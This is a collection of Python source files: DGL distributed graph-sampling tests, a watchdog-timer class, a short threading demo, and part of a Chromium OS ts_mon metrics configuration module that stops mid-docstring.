@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_get_degree_shuffle(num_server):
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_get_degree_shuffle(Path(tmpdirname), num_server)
#@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
#@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skip('Only support partition with shuffle')
def test_rpc_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
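# Map the shuffled (partitioned) node/edge IDs back to the original graph IDs
# using the 'orig_id' data stored in each partition.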
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
def start_hetero_sample_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
assert 'feat' in dist_graph.nodes['n1'].data
assert 'feat' not in dist_graph.nodes['n2'].data
assert 'feat' not in dist_graph.nodes['n3'].data
if gpb is None:
gpb = dist_graph.get_partition_book()
try:
sampled_graph = sample_neighbors(dist_graph, nodes, 3)
block = dgl.to_block(sampled_graph, nodes)
block.edata[dgl.EID] = sampled_graph.edata[dgl.EID]
except Exception as e:
print(e)
block = None
dgl.distributed.exit_client()
return block, gpb
def start_hetero_etype_sample_client(rank, tmpdir, disable_shared_mem, fanout=3,
nodes={'n3': [0, 10, 99, 66, 124, 208]}):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
assert 'feat' in dist_graph.nodes['n1'].data
assert 'feat' not in dist_graph.nodes['n2'].data
assert 'feat' not in dist_graph.nodes['n3'].data
if gpb is None:
gpb = dist_graph.get_partition_book()
try:
sampled_graph = sample_etype_neighbors(dist_graph, nodes, dgl.ETYPE, fanout)
block = dgl.to_block(sampled_graph, nodes)
block.edata[dgl.EID] = sampled_graph.edata[dgl.EID]
except Exception as e:
print(e)
block = None
dgl.distributed.exit_client()
return block, gpb
def check_rpc_hetero_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = create_random_hetero()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
block, gpb = start_hetero_sample_client(0, tmpdir, num_server > 1,
nodes = {'n3': [0, 10, 99, 66, 124, 208]})
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid_map = {ntype: F.zeros((g.number_of_nodes(ntype),), dtype=F.int64) for ntype in g.ntypes}
orig_eid_map = {etype: F.zeros((g.number_of_edges(etype),), dtype=F.int64) for etype in g.etypes}
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
ntype_ids, type_nids = gpb.map_to_per_ntype(part.ndata[dgl.NID])
for ntype_id, ntype in enumerate(g.ntypes):
idx = ntype_ids == ntype_id
F.scatter_row_inplace(orig_nid_map[ntype], F.boolean_mask(type_nids, idx),
F.boolean_mask(part.ndata['orig_id'], idx))
etype_ids, type_eids = gpb.map_to_per_etype(part.edata[dgl.EID])
for etype_id, etype in enumerate(g.etypes):
idx = etype_ids == etype_id
F.scatter_row_inplace(orig_eid_map[etype], F.boolean_mask(type_eids, idx),
F.boolean_mask(part.edata['orig_id'], idx))
for src_type, etype, dst_type in block.canonical_etypes:
src, dst = block.edges(etype=etype)
# These are global Ids after shuffling.
shuffled_src = F.gather_row(block.srcnodes[src_type].data[dgl.NID], src)
shuffled_dst = F.gather_row(block.dstnodes[dst_type].data[dgl.NID], dst)
shuffled_eid = block.edges[etype].data[dgl.EID]
orig_src = F.asnumpy(F.gather_row(orig_nid_map[src_type], shuffled_src))
orig_dst = F.asnumpy(F.gather_row(orig_nid_map[dst_type], shuffled_dst))
orig_eid = F.asnumpy(F.gather_row(orig_eid_map[etype], shuffled_eid))
# Check the node Ids and edge Ids.
orig_src1, orig_dst1 = g.find_edges(orig_eid, etype=etype)
assert np.all(F.asnumpy(orig_src1) == orig_src)
assert np.all(F.asnumpy(orig_dst1) == orig_dst)
def get_degrees(g, nids, ntype):
deg = F.zeros((len(nids),), dtype=F.int64)
for srctype, etype, dsttype in g.canonical_etypes:
if srctype == ntype:
deg += g.out_degrees(u=nids, etype=etype)
elif dsttype == ntype:
deg += g.in_degrees(v=nids, etype=etype)
return deg
def check_rpc_hetero_sampling_empty_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = create_random_hetero(empty=True)
num_parts = num_server
num_hops = 1
orig_nids, _ = partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
deg = get_degrees(g, orig_nids['n3'], 'n3')
empty_nids = F.nonzero_1d(deg == 0)
block, gpb = start_hetero_sample_client(0, tmpdir, num_server > 1,
nodes = {'n3': empty_nids})
print("Done sampling")
for p in pserver_list:
p.join()
assert block.number_of_edges() == 0
assert len(block.etypes) == len(g.etypes)
def check_rpc_hetero_etype_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = create_random_hetero(dense=True)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
fanout = 3
block, gpb = start_hetero_etype_sample_client(0, tmpdir, num_server > 1, fanout,
nodes={'n3': [0, 10, 99, 66, 124, 208]})
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = block.edges(etype=('n1', 'r2', 'n3'))
assert len(src) == 18
src, dst = block.edges(etype=('n2', 'r3', 'n3'))
assert len(src) == 18
orig_nid_map = {ntype: F.zeros((g.number_of_nodes(ntype),), dtype=F.int64) for ntype in g.ntypes}
orig_eid_map = {etype: F.zeros((g.number_of_edges(etype),), dtype=F.int64) for etype in g.etypes}
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
ntype_ids, type_nids = gpb.map_to_per_ntype(part.ndata[dgl.NID])
for ntype_id, ntype in enumerate(g.ntypes):
idx = ntype_ids == ntype_id
F.scatter_row_inplace(orig_nid_map[ntype], F.boolean_mask(type_nids, idx),
F.boolean_mask(part.ndata['orig_id'], idx))
etype_ids, type_eids = gpb.map_to_per_etype(part.edata[dgl.EID])
for etype_id, etype in enumerate(g.etypes):
idx = etype_ids == etype_id
F.scatter_row_inplace(orig_eid_map[etype], F.boolean_mask(type_eids, idx),
F.boolean_mask(part.edata['orig_id'], idx))
for src_type, etype, dst_type in block.canonical_etypes:
src, dst = block.edges(etype=etype)
# These are global Ids after shuffling.
shuffled_src = F.gather_row(block.srcnodes[src_type].data[dgl.NID], src)
shuffled_dst = F.gather_row(block.dstnodes[dst_type].data[dgl.NID], dst)
shuffled_eid = block.edges[etype].data[dgl.EID]
orig_src = F.asnumpy(F.gather_row(orig_nid_map[src_type], shuffled_src))
orig_dst = F.asnumpy(F.gather_row(orig_nid_map[dst_type], shuffled_dst))
orig_eid = F.asnumpy(F.gather_row(orig_eid_map[etype], shuffled_eid))
# Check the node Ids and edge Ids.
orig_src1, orig_dst1 = g.find_edges(orig_eid, etype=etype)
assert np.all(F.asnumpy(orig_src1) == orig_src)
assert np.all(F.asnumpy(orig_dst1) == orig_dst)
def check_rpc_hetero_etype_sampling_empty_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = create_random_hetero(dense=True, empty=True)
num_parts = num_server
num_hops = 1
orig_nids, _ = partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
fanout = 3
deg = get_degrees(g, orig_nids['n3'], 'n3')
empty_nids = F.nonzero_1d(deg == 0)
block, gpb = start_hetero_etype_sample_client(0, tmpdir, num_server > 1, fanout,
nodes={'n3': empty_nids})
print("Done sampling")
for p in pserver_list:
p.join()
assert block.number_of_edges() == 0
assert len(block.etypes) == len(g.etypes)
# Wait for non-shared-memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_sampling_shuffle(num_server):
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_sampling_empty_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), num_server)
check_rpc_hetero_etype_sampling_empty_shuffle(Path(tmpdirname), num_server)
def check_standalone_sampling(tmpdir, reshuffle):
g = CitationGraphDataset("cora")[0]
num_parts = 1
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
def check_standalone_etype_sampling(tmpdir, reshuffle):
hg = CitationGraphDataset('cora')[0]
num_parts = 1
num_hops = 1
partition_graph(hg, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", part_config=tmpdir / 'test_sampling.json')
sampled_graph = sample_etype_neighbors(dist_graph, [0, 10, 99, 66, 1023], dgl.ETYPE, 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == hg.number_of_nodes()
assert np.all(F.asnumpy(hg.has_edges_between(src, dst)))
eids = hg.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
dgl.distributed.exit_client()
def check_standalone_etype_sampling_heterograph(tmpdir, reshuffle):
hg = CitationGraphDataset('cora')[0]
num_parts = 1
num_hops = 1
src, dst = hg.edges()
new_hg = dgl.heterograph({('paper', 'cite', 'paper'): (src, dst),
('paper', 'cite-by', 'paper'): (dst, src)},
{'paper': hg.number_of_nodes()})
partition_graph(new_hg, 'test_hetero_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=reshuffle)
os.environ['DGL_DIST_MODE'] = 'standalone'
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_hetero_sampling", part_config=tmpdir / 'test_hetero_sampling.json')
sampled_graph = sample_etype_neighbors(dist_graph, [0, 1, 2, 10, 99, 66, 1023, 1024, 2700, 2701], dgl.ETYPE, 1)
src, dst = sampled_graph.edges(etype=('paper', 'cite', 'paper'))
assert len(src) == 10
src, dst = sampled_graph.edges(etype=('paper', 'cite-by', 'paper'))
assert len(src) == 10
assert sampled_graph.number_of_nodes() == new_hg.number_of_nodes()
dgl.distributed.exit_client()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_standalone_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'standalone'
with tempfile.TemporaryDirectory() as tmpdirname:
check_standalone_sampling(Path(tmpdirname), False)
check_standalone_sampling(Path(tmpdirname), True)
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
dgl.distributed.initialize("rpc_ip_config.txt")
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("test_in_subgraph", gpb=gpb)
try:
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_in_subgraph_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
time.sleep(3)
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_in_subgraph.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
subg1 = dgl.in_subgraph(g, orig_nid[nodes])
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph_shuffle(Path(tmpdirname), 2)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
def test_standalone_etype_sampling():
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling_heterograph(Path(tmpdirname), True)
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling(Path(tmpdirname), True)
check_standalone_etype_sampling(Path(tmpdirname), False)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling_heterograph(Path(tmpdirname), True)
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling(Path(tmpdirname), True)
check_standalone_etype_sampling(Path(tmpdirname), False)
check_standalone_sampling(Path(tmpdirname), True)
check_standalone_sampling(Path(tmpdirname), False)
os.environ['DGL_DIST_MODE'] = 'distributed'
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
check_rpc_get_degree_shuffle(Path(tmpdirname), 1)
check_rpc_get_degree_shuffle(Path(tmpdirname), 2)
check_rpc_find_edges_shuffle(Path(tmpdirname), 2)
check_rpc_find_edges_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), 2)
check_rpc_in_subgraph_shuffle(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_sampling_empty_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_etype_sampling_empty_shuffle(Path(tmpdirname), 1)
|
watchdog_timer.py
|
from threading import Thread, Event
from datetime import datetime, timezone
from time import sleep
import logging
logger = logging.getLogger()
class WDT:
def __init__(self, logger, callback, check_interval_sec: float = 0.01, trigger_delta_sec: float = 1, identifier=None):
self.check_interval_sec = check_interval_sec
self.trigger_delta = trigger_delta_sec * 1000000
self.callback = callback
self.identifier = identifier
self.logger = logger
self.pause_flag = False
self.resume_event = Event()
self.thread_stopped = Event()
self.poison_pill = False
self.internal_ts = self.now()
self.checker_thread_name = 'wdt_checker'
self.start()
self.logger.info("INFO",'WDT: Started')
def __del__(self):
self.stop()
self.logger.info("INFO", 'WDT: Destroyed through destructor')
@staticmethod
def now():
return int(datetime.now(tz=timezone.utc).timestamp() * 1000000)
def checker(self):
while True:
self.logger.info("DEBUG", 'WDT: Running checker')
if self.poison_pill:
break
            if self.pause_flag:
                self.logger.info("DEBUG", 'WDT: The {} thread is now paused'.format(self.checker_thread_name))
                self.resume_event.wait()
                self.resume_event.clear()
                self.logger.info("DEBUG", 'WDT: The {} thread has now resumed'.format(self.checker_thread_name))
elif (self.now() - self.internal_ts) > self.trigger_delta:
if self.identifier is None:
self.pause()
logger.info("*** BLOQUEADO, calling to recover ****")
self.callback()
self.resume()
else:
self.callback(self, self.identifier)
#logger.debug('WDT: Sleeping for {} sec.'.format(self.check_interval_sec))
sleep(self.check_interval_sec)
#logger.debug('WDT: The checker thread has exited the loop')
self.thread_stopped.set()
def update(self):
self.internal_ts = self.now()
#logger.debug('WDT: Internal timer was set to: {}'.format(self.internal_ts))
def reset(self):
self.update()
def pause(self):
self.pause_flag = True
#logger.debug('WDT: Pause command was invoked')
def resume(self):
self.pause_flag = False
#logger.debug('WDT: Resume command was invoked')
self.resume_event.set()
def start(self):
self.update()
try:
t = Thread(name=self.checker_thread_name, target=self.checker)
t.start()
except Exception as exp:
self.logger.info("ERROR",'WDT: Unable to launch the {} thread'.format(self.checker_thread_name))
self.logger.info("ERROR",'Exception: {}'.format(exp))
def stop(self):
self.poison_pill = True
#logger.debug('WDT: Poison pill was injected, to stop the {} thread'.format(self.checker_thread_name))
self.thread_stopped.wait()
self.logger.info("ERROR",'WDT: Stopped')
def get_internal_time(self):
return self.internal_ts
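# Hedged usage sketch (not part of the original module). It assumes a logger
# object exposing .info(level, msg), which is the calling convention WDT uses
# above, and a recovery callback. The monitored loop keeps calling update();
# once updates stop for longer than trigger_delta_sec, the callback fires.
if __name__ == "__main__":
    class _PrintLogger:
        def info(self, level, msg):
            print(level, msg)

    def _recover():
        print("watchdog fired: recovering")

    wdt = WDT(_PrintLogger(), _recover, check_interval_sec=0.1, trigger_delta_sec=0.5)
    try:
        for _ in range(5):
            sleep(0.2)
            wdt.update()  # feed the watchdog while work is progressing
        sleep(1.0)        # stop feeding it, so the callback fires
    finally:
        wdt.stop()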
|
threads.py
|
#thread
import threading
import time
#taking advantage of the threading.currentThread().getName() function to debug the state of your threads
def worker():
print(threading.currentThread().getName(),"Starting")
time.sleep(2)
print(threading.currentThread().getName(),"Exiting")
w = threading.Thread(name="worker",target=worker) #given a name to the thread
w2 = threading.Thread(target=worker) #use default name
w.start()
w2.start()
#debug messages can also be emitted through the logging module, as sketched below
input()
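# A hedged sketch of the logging-module variant mentioned above: the
# %(threadName)s placeholder in the format string reports the same thread
# names without any explicit print calls.
import logging
logging.basicConfig(level=logging.DEBUG,
                    format="[%(levelname)s] (%(threadName)s) %(message)s")

def logged_worker():
    logging.debug("Starting")
    time.sleep(2)
    logging.debug("Exiting")

lw = threading.Thread(name="logged_worker", target=logged_worker)
lw.start()
lw.join()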
|
ts_mon_config.py
|
# -*- coding: utf-8 -*-
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Wrapper for inframon's command-line flag based configuration."""
from __future__ import print_function
import argparse
import contextlib
import multiprocessing
import os
import socket
import signal
import time
import Queue
from chromite.lib import cros_logging as logging
from chromite.lib import metrics
from chromite.lib import parallel
try:
from infra_libs.ts_mon import config
import googleapiclient.discovery
except (ImportError, RuntimeError) as e:
config = None
logging.warning('Failed to import ts_mon, monitoring is disabled: %s', e)
_WasSetup = False
FLUSH_INTERVAL = 60
@contextlib.contextmanager
def TrivialContextManager():
"""Context manager with no side effects."""
yield
def SetupTsMonGlobalState(service_name,
indirect=False,
suppress_exception=True,
short_lived=False,
auto_flush=True,
debug_file=None,
task_num=0):
"""Uses a dummy argument parser to get the default behavior from ts-mon.
Args:
service_name: The name of the task we are sending metrics from.
indirect: Whether to create a metrics.METRICS_QUEUE object and a separate
process for indirect metrics flushing. Useful for forking,
because forking would normally create a duplicate ts_mon thread.
suppress_exception: True to silence any exception during the setup. Default
is set to True.
short_lived: Whether this process is short-lived and should use the autogen
hostname prefix.
auto_flush: Whether to create a thread to automatically flush metrics every
minute.
debug_file: If non-none, send metrics to this path instead of to PubSub.
task_num: (Default 0) The task_num target field of the metrics to emit.
"""
if not config:
return TrivialContextManager()
# The flushing subprocess calls .flush manually.
if indirect:
auto_flush = False
  # google-api-client produces too much noisy logging.
options = _GenerateTsMonArgparseOptions(
service_name, short_lived, auto_flush, debug_file, task_num)
if indirect:
return _CreateTsMonFlushingProcess(options)
else:
_SetupTsMonFromOptions(options, suppress_exception)
return TrivialContextManager()
def _SetupTsMonFromOptions(options, suppress_exception):
"""Sets up ts-mon global state given parsed argparse options.
Args:
options: An argparse options object containing ts-mon flags.
suppress_exception: True to silence any exception during the setup. Default
is set to True.
"""
googleapiclient.discovery.logger.setLevel(logging.WARNING)
try:
config.process_argparse_options(options)
logging.notice('ts_mon was set up.')
global _WasSetup # pylint: disable=global-statement
_WasSetup = True
except Exception as e:
logging.warning('Failed to configure ts_mon, monitoring is disabled: %s', e,
exc_info=True)
if not suppress_exception:
raise
def _GenerateTsMonArgparseOptions(service_name, short_lived,
auto_flush, debug_file, task_num):
"""Generates an arg list for ts-mon to consume.
Args:
service_name: The name of the task we are sending metrics from.
short_lived: Whether this process is short-lived and should use the autogen
hostname prefix.
auto_flush: Whether to create a thread to automatically flush metrics every
minute.
debug_file: If non-none, send metrics to this path instead of to PubSub.
task_num: Override the default task num of 0.
"""
parser = argparse.ArgumentParser()
config.add_argparse_options(parser)
args = [
'--ts-mon-target-type', 'task',
'--ts-mon-task-service-name', service_name,
'--ts-mon-task-job-name', service_name,
]
if debug_file:
args.extend(['--ts-mon-endpoint', 'file://' + debug_file])
# Short lived processes will have autogen: prepended to their hostname and
# use task-number=PID to trigger shorter retention policies under
# chrome-infra@, and used by a Monarch precomputation to group across the
# task number.
# Furthermore, we assume they manually call ts_mon.Flush(), because the
# ts_mon thread will drop messages if the process exits before it flushes.
if short_lived:
auto_flush = False
fqdn = socket.getfqdn().lower()
host = fqdn.split('.')[0]
args.extend(['--ts-mon-task-hostname', 'autogen:' + host,
'--ts-mon-task-number', str(os.getpid())])
elif task_num:
args.extend(['--ts-mon-task-number', str(task_num)])
args.extend(['--ts-mon-flush', 'auto' if auto_flush else 'manual'])
return parser.parse_args(args=args)
@contextlib.contextmanager
def _CreateTsMonFlushingProcess(options):
"""Creates a separate process to flush ts_mon metrics.
Useful for multiprocessing scenarios where we don't want multiple ts-mon
  threads sending contradictory metrics. Instead, functions in
chromite.lib.metrics will send their calls to a Queue, which is consumed by a
dedicated flushing process.
Args:
options: An argparse options object to configure ts-mon with.
Side effects:
Sets chromite.lib.metrics.MESSAGE_QUEUE, which causes the metric functions
to send their calls to the Queue instead of creating the metrics.
"""
# If this is nested, we don't need to create another queue and another
# message consumer. Do nothing to continue to use the existing queue.
  if metrics.MESSAGE_QUEUE or metrics.FLUSHING_PROCESS:
    yield metrics.MESSAGE_QUEUE
    return
with parallel.Manager() as manager:
message_q = manager.Queue()
metrics.FLUSHING_PROCESS = multiprocessing.Process(
target=lambda: _SetupAndConsumeMessages(message_q, options))
metrics.FLUSHING_PROCESS.start()
# this makes the chromite.lib.metric functions use the queue.
# note - we have to do this *after* forking the ConsumeMessages process.
metrics.MESSAGE_QUEUE = message_q
try:
yield message_q
finally:
_CleanupMetricsFlushingProcess()
def _CleanupMetricsFlushingProcess():
"""Sends sentinal value to flushing process and .joins it."""
# Now that there is no longer a process to listen to the Queue, re-set it
# to None so that any future metrics are created within this process.
message_q = metrics.MESSAGE_QUEUE
flushing_process = metrics.FLUSHING_PROCESS
metrics.MESSAGE_QUEUE = None
metrics.FLUSHING_PROCESS = None
# If the process has already died, we don't need to try to clean it up.
if not flushing_process.is_alive():
return
  # Send the sentinel value for "flush one more time and exit".
try:
message_q.put(None)
# If the flushing process quits, the message Queue can become full.
except IOError:
if not flushing_process.is_alive():
return
logging.info("Waiting for ts_mon flushing process to finish...")
flushing_process.join(timeout=FLUSH_INTERVAL*2)
if flushing_process.is_alive():
flushing_process.terminate()
if flushing_process.exitcode:
logging.warning("ts_mon_config flushing process did not exit cleanly.")
logging.info("Finished waiting for ts_mon process.")
def _SetupAndConsumeMessages(message_q, options):
"""Sets up ts-mon, and starts a MetricConsumer loop.
Args:
message_q: The metric multiprocessing.Queue to read from.
options: An argparse options object to configure ts-mon with.
"""
# Configure ts-mon, but don't start up a sending thread.
_SetupTsMonFromOptions(options, suppress_exception=True)
if not _WasSetup:
return
return MetricConsumer(message_q).Consume()
class MetricConsumer(object):
"""Configures ts_mon and gets metrics from a message queue.
This class is meant to be used in a subprocess. It configures itself
to receive a SIGHUP signal when the parent process dies, and catches the
signal in order to have a chance to flush any pending metrics one more time
before quitting.
"""
def __init__(self, message_q):
# If our parent dies, finish flushing before exiting.
self.reset_after_flush = []
self.last_flush = 0
self.pending = False
self.message_q = message_q
if parallel.ExitWithParent(signal.SIGHUP):
signal.signal(signal.SIGHUP, lambda _sig, _stack: self._WaitToFlush())
def Consume(self):
"""Emits metrics from self.message_q, flushing periodically.
The loop is terminated by a None entry on the Queue, which is a friendly
signal from the parent process that it's time to shut down. Before
